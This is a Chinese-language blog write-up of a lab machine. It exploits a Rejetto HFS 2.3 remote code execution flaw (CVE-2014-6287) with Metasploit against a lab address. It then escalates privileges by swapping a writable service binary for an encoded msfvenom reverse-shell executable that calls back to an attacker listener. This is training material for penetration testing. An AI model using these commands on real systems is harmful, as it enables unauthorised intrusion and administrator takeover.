SugarCrash!

记录学习,想找个师傅带带我

0%

Mr.Robot

使用 metasploit 进行初始访问,使用 powershell 进行 Windows 特权升级枚举,并学习一种新技术来获得管理员访问权限。

Nmap

202205181148131.png
8080端口开的这个服务
202205181148132.png
Rejetto HTTP File Server 2.3 找到个rce—CVE-2014–6287
可以用msf直接利用

rce利用

1
2
3
4
use exploit/windows/http/rejetto_hfs_exec  
set RHOSTS 10.10.240.57
set RPORT 8080
run

202205181148133.png

提权

传个之前的PowerUp 的 powershell 脚本,其目的是评估 Windows 机器并确定任何异常情况 -  “ PowerUp 旨在成为 _依赖于错误配置的常见 Windows 权限提升向量的交换所。
用metasploit的upload命令来上传脚本

1
2
upload /root/tools/tiquan/windows/PowerUp.ps1 -> c://users//bill//desktop\PowerUp.ps1

上传到目标桌面后

1
2
3
4
load powershell
pwershell_shell 进入powershell
. .\Powerup.ps1
Invoke-Allchecks

202205181148134.png

1
2
3
记录路径
CanRestart : True 表示可以重启应用程序的目录也是可写的
C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
1
msfvenom -p windows/shell_reverse_tcp LHOST=<攻击者ip> LPORT=<攻击者端口> -e x86/shikata_ga_nai -f exe -o ASCService.exe

另起一个msf监听

1
2
3
4
use exploit/multi/handler
set lhost 10.13.40.87
set lport 和上面生成的端口一样
exploit
1
2
3
4
5
6
7
8
回到先前的shell里
shell
sc stop AdvancedSystemCareService9 关闭这个可以重启的服务

copy ASCService.exe "\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe" 把生成的马替换掉

sc start AdvancedSystemCareService9 启动这个服务

202205181148135.png